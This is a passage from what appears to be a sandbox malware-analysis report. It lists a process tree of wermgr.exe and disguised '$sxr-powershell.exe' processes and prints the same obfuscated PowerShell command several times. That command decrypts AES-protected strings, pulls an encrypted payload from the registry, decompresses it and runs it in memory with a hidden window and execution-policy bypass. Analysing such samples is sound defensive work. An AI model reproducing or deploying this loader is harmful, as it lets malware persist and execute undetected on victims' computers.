[Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        Hide Artifacts: Hidden Window
        
        PID:9020
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "8708" "3200" "3104" "3204" "0" "0" "3208" "0" "0" "0" "0" "0"
        28⤵
        
        PID:5540
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5824" "3064" "2984" "3068" "0" "0" "2716" "0" "0" "0" "0" "0"
        27⤵
        
        PID:7996
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8432).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        26⤵
        
        PID:8604
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8432).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        26⤵
        
        PID:8096
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8096).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        
        PID:6652
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8096).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = 